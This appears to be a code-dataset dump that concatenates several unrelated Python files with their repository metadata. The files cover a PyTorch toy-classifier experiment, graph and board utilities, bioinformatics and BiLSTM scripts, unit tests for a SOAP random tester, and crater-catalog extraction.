"icon-theme": "Win11",
"fontname": "Noto Sans 40",
} | (options or {})
result = cli.get("yad", f"--{subcommand}", *args, options, check=False)
return result
def ask_yn(question):
res = subprocess.run(("kdialog", "--yesno", question), capture_output=True)
return res.returncode == 0
| 29.296296 | 79 | 0.606195 | 197 | 1,582 | 4.827411 | 0.431472 | 0.046267 | 0.037855 | 0.063091 | 0.078864 | 0.054679 | 0 | 0 | 0 | 0 | 0 | 0.019199 | 0.242731 | 1,582 | 53 | 80 | 29.849057 | 0.774624 | 0.032238 | 0 | 0.047619 | 0 | 0 | 0.151733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90d9c04b806e6d86ef86148bed6c3ca773c27ce | 7,425 | py | Python | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | # DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
#
# This material is based upon work supported by the Assistant Secretary of Defense for Research and
# Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions,
# findings, conclusions or recommendations expressed in this material are those of the author(s) and
# do not necessarily reflect the views of the Assistant Secretary of Defense for Research and
# Engineering.
#
# © 2018 Massachusetts Institute of Technology.
#
# MIT Proprietary, Subject to FAR52.227-11 Patent Rights - Ownership by the contractor (May 2014)
#
# The software/firmware is provided to you on an As-Is basis
#
# Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or
# 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are
# defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than
# as specifically authorized by the U.S. Government may violate any copyrights that exist in this
# work.
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
import torch
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from collections import defaultdict
from collections import OrderedDict
class NumberNet(nn.Module):
"""
SimpleNetwork that classifies floats into integers
The network is supposed to be small enough that we can visualize the entire thing
and understand what it is doing.
"""
def __init__(self):
super(NumberNet, self).__init__()
self.layer = nn.Linear(1, 5)
def forward(self, x):
return self.layer(x).view(-1, 5)
class DeepNumberNet(nn.Module):
"""
NumberNet but with a bunch of layers
"""
def __init__(self):
super(DeepNumberNet, self).__init__()
self.model = nn.Sequential(OrderedDict([
('layer1', nn.Linear(1, 20)),
('activation1', nn.LeakyReLU()),
('layer2', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer2', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer3', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer3', nn.Linear(20, 20)),
('activation4', nn.LeakyReLU()),
('layer4', nn.Linear(20, 20)),
('activation5', nn.LeakyReLU()),
('layer5', nn.Linear(20, 20)),
('activation5', nn.LeakyReLU()),
('layer6', nn.Linear(20, 20)),
('activation6', nn.LeakyReLU()),
('layer11', nn.Linear(20, 5)),
('activation11', nn.LeakyReLU())
]))
def forward(self, x):
output = self.model(x)
return output.view(-1, 5)
def dsig(x):
"""
4 e^x
----
(e^x + 1)^2
"""
expo = torch.exp(x)
expo_plus_one = expo + 1
square = expo_plus_one * expo_plus_one
return expo.div(square) * 4
class DSigNet(nn.Module):
"""
A simple network to test the dsig activation.
The intuition behind the dsig activation:
Monotonic activations break up the input space into a collection of half spaces.
The Universal Approximation Theory tells us that neural networks can approximate
any function within a finite domain. For classification tasks, neural networks approximate
a probability distribution. Half spaces do not constrain themselves to a finite
domain, so neural networks which are made up of a collection of half spaces will
inevitable produce high probability estimates for out of domain examples.
So instead of building a neural network which is a collection of half spaces, lets
build a network which is a collection of completely bounded spaces. A network like this
will require more nodes to approximate the same function. Potentially many many more nodes,
because you will need a node for each section of the input, whereas before many thousands
of sections could be classified with one halfspace. On the other hand a collection of
bounded spaces will do a better job at approximating the domain.
"""
def __init__(self):
super(DSigNet, self).__init__()
self.layer = nn.Linear(1, 5)
def forward(self, x):
return dsig(self.layer(x)).view(-1, 5)
def plot_decision_boundary(number_net, numbers, span=(-10, 1)):
lower, upper = span
plt.ylim(-0.2, 1.2)
plt.xlim(lower, upper)
plt.xticks([i for i in range(lower, upper+1) if i % 5 == 0])
domain = np.linspace(lower, upper, (upper - lower) * 10)
domain = torch.tensor(domain).float().view(-1, 1)
outputs = number_net(domain)
softmax = F.softmax(outputs, 1)
max_values, output_labels = outputs.max(1)
softmax = softmax.detach().numpy()
# softmax = outputs.detach().numpy()
train_data, train_labels = numbers.data, numbers.labels
train_dict = defaultdict(list)
for train, la in zip(train_data, train_labels):
train_dict[la].append(train)
labels = [0, 1, 2, 3, 4]
domain_dict = defaultdict(list)
color_dict = dict()
colors = iter(cm.rainbow(np.linspace(0, 1, len(labels))))
for label in labels:
color_dict[label] = next(colors)
domain = domain.numpy()
output_labels = output_labels.numpy()
for do, la in zip(domain, output_labels):
domain_dict[la].append(do)
# for key in domain_dict:
# plt.scatter(domain_dict[key], [key] * len(domain_dict[key]), color=color_dict[key])
for label in labels:
plt.plot(domain, softmax[:, label], color=color_dict[label])
for label in labels:
plt.scatter(train_dict[label], [0] * len(train_dict[label]), color=color_dict[label])
plt.show()
def plot_loss(loss_history):
plt.plot(np.arange(0, len(loss_history)), loss_history)
plt.show()
if __name__ == "__main__":
# number_net = NumberNet()
#deep_number_net = DeepNumberNet()
dsig_net = DSigNet()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(dsig_net.parameters(), lr=0.01, momentum=0.9)
# deep_optimizer = optim.SGD(number_net.parameter(), lr=0.01, momentum=0.9)
dataloader = DataLoader(Numbers(), shuffle=True, batch_size=5)
loss_history = list()
for epoch in range(100000):
running_loss = 0.0
for i, (data, labels) in enumerate(dataloader):
data, labels = Variable(data.float().view(-1, 1)), Variable(labels.long())
optimizer.zero_grad()
# deep_optimizer.zero_grad()
outputs = dsig_net(data)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
loss_history.append(running_loss)
print("Loss: " + str(running_loss))
print()
# for name, param in number_net.named_parameters():
# if param.requires_grad:
# print(name, param.data)
# print()
# print()
# Plot loss graph and decision boundaries
if epoch % 10000 == 0:
if epoch % 50000 == 0:
plot_loss(loss_history)
plot_decision_boundary(dsig_net)
input("To continue press enter")
| 34.534884 | 100 | 0.654545 | 1,009 | 7,425 | 4.723489 | 0.345887 | 0.018464 | 0.016786 | 0.017625 | 0.142887 | 0.113093 | 0.088754 | 0.074486 | 0.074486 | 0.051406 | 0 | 0.035373 | 0.238519 | 7,425 | 214 | 101 | 34.696262 | 0.807393 | 0.383838 | 0 | 0.198198 | 0 | 0 | 0.043528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.099099 | 0.018018 | 0.243243 | 0.018018 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90e7322e3f76de768fce6699f8d10d828183ad2 | 2,018 | py | Python | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 49 | 2018-01-06T12:57:56.000Z | 2021-09-03T09:48:32.000Z | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 101 | 2018-01-16T19:24:21.000Z | 2021-11-10T19:39:33.000Z | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 32 | 2018-02-15T19:39:50.000Z | 2020-11-26T22:32:05.000Z | import textwrap
import click
def show_ugraph(ugraph, oneline=False, ignore_unknown_op=False):
from utensor_cgen.backend.utensor.code_generator.legacy._operators import OperatorFactory
unknown_ops = set([])
if oneline:
tmpl = click.style("{op_name} ", fg='yellow', bold=True) + \
"op_type: {op_type}, inputs: {inputs}, outputs: {outputs}"
for op_name in ugraph.topo_order:
op_info = ugraph.ops_info[op_name]
msg = tmpl.format(op_name=op_name, op_type=op_info.op_type,
inputs=[tensor.name for tensor in op_info.input_tensors],
outputs=[tensor.name for tensor in op_info.output_tensors])
click.echo(msg)
if not OperatorFactory.is_supported(op_info.op_type):
unknown_ops.add(op_info)
else:
tmpl = click.style('op_name: {op_name}\n', fg='yellow', bold=True) + \
'''\
op_type: {op_type}
input(s):
{inputs}
{input_shapes}
ouptut(s):
{outputs}
{output_shapes}
'''
tmpl = textwrap.dedent(tmpl)
paragraphs = []
for op_name in ugraph.topo_order:
op_info = ugraph.ops_info[op_name]
op_str = tmpl.format(
op_name=op_name,
op_type=op_info.op_type,
inputs=op_info.input_tensors,
outputs=op_info.output_tensors,
input_shapes=[tensor.shape for tensor in op_info.input_tensors],
output_shapes=[tensor.shape for tensor in op_info.output_tensors])
paragraphs.append(op_str)
if not OperatorFactory.is_supported(op_info.op_type):
unknown_ops.add(op_info)
click.echo('\n'.join(paragraphs))
click.secho(
'topological ordered ops: {}'.format(ugraph.topo_order),
fg='white', bold=True,
)
if unknown_ops and not ignore_unknown_op:
click.echo(
click.style('Unknown Ops Detected', fg='red', bold=True)
)
for op_info in unknown_ops:
click.echo(
click.style(' {}: {}'.format(op_info.name, op_info.op_type), fg='red')
)
return 0
| 33.633333 | 91 | 0.648167 | 280 | 2,018 | 4.417857 | 0.246429 | 0.082458 | 0.038804 | 0.048504 | 0.499596 | 0.44139 | 0.44139 | 0.357316 | 0.257074 | 0.257074 | 0 | 0.000644 | 0.230922 | 2,018 | 59 | 92 | 34.20339 | 0.796392 | 0 | 0 | 0.217391 | 0 | 0 | 0.090032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.065217 | 0 | 0.108696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90ed500716a103d48309e19afcddb7e4867f4c9 | 1,396 | py | Python | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 2 | 2020-12-03T06:26:48.000Z | 2022-01-30T22:00:22.000Z | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 4 | 2020-08-23T21:21:30.000Z | 2021-04-02T01:05:48.000Z | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 2 | 2020-08-20T16:38:17.000Z | 2020-08-28T02:07:31.000Z | # board.py
# abstract class for zorg and edge
import time
from ocan import *
class Board():
can_id = None
pause = True
ocan = None
def __init__(self, manifest):
self.manifest = manifest
self.ocan = OCan()
self.init_board()
self.init_filters()
self.boot()
def init_filters(self):
self.ocan._setfilter(0, (0,0) )
def init_board(self):
# setup Edge hardware (driven by manifest and driver)
if "driver" in self.manifest:
driver = self.manifest['driver']
print("init_board driver:", driver)
module = __import__(driver)
print("init_board module:", module)
driver = getattr( module, driver )
self.driver = driver()
# manifest parameters create 2 things:
# 1. list of names in edge.parameters
# 2. dict in driver.parameters
for parameter in self.manifest['parameters']:
self.parameters.append(parameter['name'])
driver.parameters[parameter['name']] = parameter
if "init" in self.manifest:
init = self.manifest['init']
print("init_board init:", init)
init = getattr(self.driver,init)
init()
def boot(self):
# Zorg just goes, Edge waits on Zorg
pass
| 23.266667 | 64 | 0.553725 | 155 | 1,396 | 4.877419 | 0.335484 | 0.111111 | 0.055556 | 0.05291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006593 | 0.348138 | 1,396 | 59 | 65 | 23.661017 | 0.824176 | 0.164756 | 0 | 0 | 0 | 0 | 0.077787 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.03125 | 0.09375 | 0 | 0.34375 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90f3304a9f8b119e26ad00862e02c94d7978328 | 962 | py | Python | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | 1 | 2020-03-07T07:15:51.000Z | 2020-03-07T07:15:51.000Z |
import rob
import sys
# 1404927386.fasta analyzed_sequences.txt annotations.txt
#
faf=None
try:
faf=sys.argv[1]
except IndexError:
sys.stderr.write("Please provide a fasta file\n")
sys.exit(0)
fa = rob.readFasta(faf)
analyzed=[]
with open('analyzed_sequences.txt', 'r') as asf:
for line in asf:
pieces=line.rstrip()
analyzed.append(pieces)
if pieces not in fa:
sys.stderr.write(pieces + " has been analyzed but is not in " + faf + "\n")
for f in fa:
if f not in analyzed:
sys.stderr.write("NOT ANALYZED: " + f + "\n")
annotated=[]
with open('annotations.txt', 'r') as asf:
for line in asf:
pieces=line.split("\t")
annotated.append(pieces[0])
if pieces[0] not in fa:
sys.stderr.write(pieces[0] + " has been annotated but is not in " + faf + "\n")
for f in fa:
if f not in annotated:
sys.stderr.write("NOT ANNOTATED: " + f + "\n")
| 20.468085 | 91 | 0.60395 | 145 | 962 | 3.993103 | 0.331034 | 0.051813 | 0.120898 | 0.031088 | 0.303972 | 0.303972 | 0.303972 | 0.210708 | 0.210708 | 0.210708 | 0 | 0.021127 | 0.261954 | 962 | 46 | 92 | 20.913043 | 0.794366 | 0.059252 | 0 | 0.137931 | 0 | 0 | 0.193764 | 0.024499 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.068966 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9102c896bee462a9b81d732607e83c597abdf5a | 1,403 | py | Python | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | 2 | 2019-04-18T18:06:41.000Z | 2021-03-09T02:05:34.000Z | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | null | null | null | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | null | null | null | import os
import tqdm
import torch
import numpy as np
from parser import parse_args
from scene.data import DataSet
from torchtext.data import Iterator
from scene.data.loaders import BatchWrapper
from scene.models import BiLSTM
def predict(model, loader):
model.eval()
predictions = []
for data in tqdm.tqdm(loader):
pred = model(data)
_, pred = torch.max(pred.data, 1)
predictions.append(pred)
return np.array(predictions)
def main():
args = parse_args()
torch.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
data = DataSet(args.datapath)
train_data, val_data, test_data = data.load_splits()
vocab = data.textfield.vocab
test_iter = Iterator(
test_data,
batch_size=1,
device=device,
sort=False,
sort_within_batch=False,
repeat=False
)
testloader = BatchWrapper(test_iter)
savepath = os.path.join(args.savepath, 'bilstm_small_val.pth')
savepoint = torch.load(savepath)
model = BiLSTM(num_vocab=len(vocab), n_classes=10).to(device)
model.load_state_dict(savepoint['model_state_dict'])
predictions = predict(model, test_iter)
outpath = os.path.join(args.savepath, 'test_preds.npy')
np.save(outpath, predictions)
if __name__=='__main__':
main() | 24.189655 | 66 | 0.685674 | 189 | 1,403 | 4.899471 | 0.439153 | 0.029158 | 0.028078 | 0.030238 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003613 | 0.210976 | 1,403 | 58 | 67 | 24.189655 | 0.832882 | 0 | 0 | 0 | 0 | 0 | 0.046296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.209302 | 0 | 0.27907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9130637f37aa67dccc5076d10b6043a6f6dd312 | 9,926 | py | Python | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 3 | 2020-02-11T14:22:51.000Z | 2020-11-26T19:09:03.000Z | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 1 | 2019-11-22T02:06:47.000Z | 2021-05-10T07:22:26.000Z | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 4 | 2019-12-12T10:44:07.000Z | 2022-03-10T14:09:27.000Z | # -*- coding: utf-8 -*-
"""
Unit tests for the RandomTester class.
@author: m.utting@uq.edu.au
"""
import unittest
import random
from pathlib import Path
import sklearn.utils.estimator_checks
from typing import Tuple, List, Set, Dict, Optional, Any
import agilkia
THIS_DIR = Path(__file__).parent
WSDL_EG = "http://www.soapclient.com/xml/soapresponder.wsdl"
test_input_rules = {
"username": ["User1"],
"password": ["<GOOD_PASSWORD>"] * 9 + ["bad-pass"],
"speed": [str(s) for s in range(0, 120, 10)],
"bstrParam1": ["VAL1"],
"bstrParam2": ["p2AAA", "p2BBB"],
}
class TestReadInputRules(unittest.TestCase):
def test_1(self):
rules = agilkia.read_input_rules(THIS_DIR / "fixtures/inputs1.csv")
self.assertEqual(["one"], rules["bstrParam1"])
self.assertEqual(['two', 'two', 'two', 'TWO!'], rules["bstrParam2"])
class TestRandomTester(unittest.TestCase):
def setUp(self):
self.tester = agilkia.RandomTester(
WSDL_EG,
input_rules=test_input_rules,
rand=random.Random(1234))
def test_input_user(self):
self.assertEqual("User1", self.tester.choose_input_value("username"))
def test_input_password(self):
self.assertEqual(agilkia.GOOD_PASSWORD, self.tester.choose_input_value("password"))
def test_input_speeds(self):
speeds = set()
for i in range(100):
speeds.add(self.tester.choose_input_value("speed"))
self.assertEqual(12, len(speeds)) # all results should be covered
def test_signature(self):
sig = self.tester.get_methods()
self.assertEqual(1, len(sig))
self.assertEqual({"Method1"}, sig.keys())
msig = sig["Method1"]
self.assertEqual(1, len(msig))
self.assertEqual({"input"}, msig.keys())
self.assertEqual({"bstrParam1", "bstrParam2"}, msig["input"].keys())
param1_details = "{'optional': False, 'type': 'String(value)'}"
self.assertEqual(param1_details, str(msig["input"]["bstrParam1"]))
def test_dummy_client_meta(self):
"""Test the dummy web service provided by soapresponder."""
tester = agilkia.RandomTester(WSDL_EG,
input_rules=test_input_rules,
rand=random.Random(1234))
meta_keys = ["date", "author", "dataset", "source",
"web_services", "methods_to_test", "input_rules",
"method_signatures"]
mdata = tester.trace_set.meta_data
for k in meta_keys:
self.assertTrue(k in mdata, msg=k + " expected in meta_data")
self.assertEqual(f"RandomTester", mdata["source"])
self.assertEqual([WSDL_EG], mdata["web_services"])
# check the signature
self.assertEqual(set(["Method1"]), set(mdata["method_signatures"].keys()))
sig = {'input': {
'bstrParam1': {'optional': False, 'type': 'String(value)'},
'bstrParam2': {'optional': False, 'type': 'String(value)'}}}
self.assertEqual(sig, mdata["method_signatures"]["Method1"])
def test_dummy_client0(self):
"""Test the dummy web service provided by soapresponder."""
tester = agilkia.RandomTester(WSDL_EG, verbose=True,
input_rules=test_input_rules,
rand=random.Random(1234))
print("Methods:", tester.get_methods())
out1 = tester.call_method("Method1")
expect = {"Status": 0, "value": "Your input parameters are VAL1 and p2AAA"}
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
expect["value"] = "Your input parameters are VAL1 and p2BBB"
self.assertEqual(expect, out1.outputs)
self.assertEqual(4, len(tester.curr_events))
self.assertEqual(1, len(tester.trace_set.traces))
# now generate a second trace
tester.generate_trace(start=True, length=3)
self.assertEqual(3, len(tester.curr_events))
self.assertEqual(2, len(tester.trace_set.traces))
# now test saving and loading those traces.
traceset1 = tester.trace_set
tmp_json = Path("tmp_dummy1.json")
traceset1.save_to_json(tmp_json)
traceset2 = agilkia.TraceSet.load_from_json(tmp_json)
self.assertEqual(traceset2.meta_data, traceset1.meta_data)
self.assertEqual(len(traceset2.traces), len(traceset1.traces))
self.assertEqual(traceset2.traces[0].events[0].action,
traceset1.traces[0].events[0].action)
tmp_json.unlink()
def test_generate_trace(self):
tr = self.tester.generate_trace()
self.assertTrue(isinstance(tr, agilkia.Trace))
self.assertEqual(20, len(tr.events))
def test_decode_outputs(self):
self.assertEqual({'Status': 0, "value": "abc"}, self.tester.decode_outputs("abc"))
self.assertEqual({'Status': 0, "a": 2}, self.tester.decode_outputs({"a": 2}))
# Also, zeep XML object outputs are tested in test_dummy_client0 above.
class TestTracePrefixExtractor(unittest.TestCase):
ev1 = agilkia.Event("Order", {"Name": "Mark"}, {"Status": 0})
ev2 = agilkia.Event("Skip", {"Size": 3}, {"Status": 1, "Error": "Too big"})
ev3 = agilkia.Event("Pay", {"Name": "Mark", "Amount": 23.45}, {"Status": 0})
def test_bag_of_words(self):
tr1 = agilkia.Trace([self.ev1, self.ev2])
tr2 = agilkia.Trace([self.ev3])
traces = agilkia.TraceSet([tr1, tr1, tr2])
self.assertEqual(3, len(traces))
sut = agilkia.TracePrefixExtractor()
sut.fit(traces)
self.assertEqual(["Order", "Pay", "Skip"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((8, 3), X.shape)
self.assertEqual(8, len(y))
for row in [0, 3, 6]:
self.assertEqual([0.0, 0.0, 0.0], X.iloc[row, :].tolist())
self.assertEqual("Order" if row < 6 else "Pay", y[row])
for row in [2, 5]:
self.assertEqual([1.0, 0.0, 1.0], X.iloc[row, :].tolist())
self.assertEqual(agilkia.TRACE_END, y[row])
self.assertEqual([0.0, 1.0, 0.0], X.iloc[7, :].tolist())
def test_bag_of_words_custom(self):
"""Test TracePrefixExtractor with a custom event-to-string function."""
def custom(ev): return ev.inputs.get("Name", "???")
tr1 = agilkia.Trace([self.ev1, self.ev2])
tr2 = agilkia.Trace([self.ev3, self.ev3])
traces = agilkia.TraceSet([tr1, tr1, tr2])
self.assertEqual(3, len(traces))
self.assertEqual("Mark", custom(self.ev1))
self.assertEqual("???", custom(self.ev2))
sut = agilkia.TracePrefixExtractor(custom)
sut.fit(traces)
self.assertEqual(["???", "Mark"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((9, 2), X.shape)
self.assertEqual(9, len(y))
for row in [0, 3, 6]:
self.assertEqual([0.0, 0.0], X.iloc[row, :].tolist())
self.assertEqual(custom(traces[row // 3][0]), y[row])
for row in [2, 5]:
self.assertEqual([1.0, 1.0], X.iloc[row, :].tolist())
self.assertEqual(agilkia.TRACE_END, y[row])
self.assertEqual([0.0, 2.0], X.iloc[8, :].tolist())
def test_custom_subclass(self):
"""Test TracePrefixExtractor subclass with a custom encoder that::
- counts Order events
- sums all 'Size' inputs
- reports the current action (0=Order, 1=Skip, 2=Pay)
- and learns status output values.
"""
action2num = {"Order": 0, "Skip": 1, "Pay": 2}
class MyPrefixExtractor(agilkia.TracePrefixExtractor):
def generate_feature_names(self, trace: agilkia.Trace) -> Set[str]:
return {"Orders", "TotalSize", "CurrAction"}
def generate_prefix_features(self, events: List[agilkia.Event],
current: Optional[agilkia.Event]) -> Tuple[Dict[str, float], Any]:
total = sum([ev.inputs.get("Size", 0) for ev in events])
orders = len([ev.action for ev in events if ev.action == "Order"])
if current is not None:
action = action2num[current.action]
learn = current.status
else:
action = -1
learn = -1
return {"Orders": orders, "TotalSize": total, "CurrAction": action}, learn
tr1 = agilkia.Trace([self.ev1, self.ev2, self.ev2, self.ev1])
tr2 = agilkia.Trace([self.ev3, self.ev3])
traces = agilkia.TraceSet([tr1, tr2])
# now run the encoder
sut = MyPrefixExtractor()
sut.fit(traces)
self.assertEqual(["CurrAction", "Orders", "TotalSize"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((8, 3), X.shape)
self.assertEqual(8, len(y))
# tr1 prefixes
self.assertEqual([0, 0, 0], X.iloc[0, :].tolist())
self.assertEqual([1, 1, 0], X.iloc[1, :].tolist())
self.assertEqual([1, 1, 3], X.iloc[2, :].tolist())
self.assertEqual([0, 1, 6], X.iloc[3, :].tolist())
self.assertEqual([-1, 2, 6], X.iloc[4, :].tolist())
self.assertEqual([0, 1, 1, 0, -1], y[0:5])
# tr2 prefixes
self.assertEqual([2, 0, 0], X.iloc[5, :].tolist())
self.assertEqual([2, 0, 0], X.iloc[6, :].tolist())
self.assertEqual([-1, 0, 0], X.iloc[7, :].tolist())
self.assertEqual([0, 0, -1], y[5:])
| 42.969697 | 107 | 0.590872 | 1,209 | 9,926 | 4.754342 | 0.210918 | 0.161795 | 0.043841 | 0.008525 | 0.383612 | 0.306193 | 0.27366 | 0.23382 | 0.23382 | 0.226166 | 0 | 0.033086 | 0.253979 | 9,926 | 230 | 108 | 43.156522 | 0.743147 | 0.070623 | 0 | 0.22905 | 0 | 0 | 0.103501 | 0 | 0 | 0 | 0 | 0 | 0.357542 | 1 | 0.089385 | false | 0.01676 | 0.03352 | 0.011173 | 0.173184 | 0.005587 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d914350d04727b2996e71856ecd3f13d1e827077 | 2,576 | py | Python | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | # extract the Salamunnicar data from the XLS file
import pandas as pd
import pkg_resources
import logging
import os
def extract_salamuniccar(filename, tables=None,
output_prefix=None,
output_filename=None):
"""Extract the lat,long, diameter from the Salamuniccar catalogs."""
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
logger.info("Reading Excel file")
logger.info(output_filename)
dfe = pd.ExcelFile(filename)
names = [x for x in dfe.sheet_names if
x != "YourCatalogue" and x != "Macros"]
tables = tables or names
if isinstance(tables, str):
tables = [tables]
output_prefix = output_prefix or "GS_"
mapping_name = pkg_resources.resource_filename('cratertools',
'data/salamuniccar_mapping.csv',)
mapping = pd.read_csv(mapping_name, index_col=0)
for name in tables:
logger.info("Processing table : {}".format(name))
df = pd.read_excel(filename, name)
outname = output_prefix+name
df.to_hdf(outname, "/"+name)
if output_filename is None:
continue
print(name, mapping.index)
if name in mapping.index:
d = mapping[mapping.index == name]
v, k = d.columns.values, d.values[0]
df = df.loc[:, k]
df.rename(columns=dict(zip(k, v)),
inplace=True)
# warp the longitude
df["Long"][df["Long"] > 180] -= 360
df = df.dropna()
df.to_hdf(output_filename, name,
append=os.path.exists(output_filename), complevel=5)
def extract_robbins(filename, output_filename=None):
"""Extract the lat,long, diameter from the robbins catalog."""
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
logger.info("Reading Robbins data")
robbins = pd.read_table(filename, engine="python", delimiter="\t")
mapping_name = pkg_resources.resource_filename('cratertools',
'data/salamuniccar_mapping.csv',)
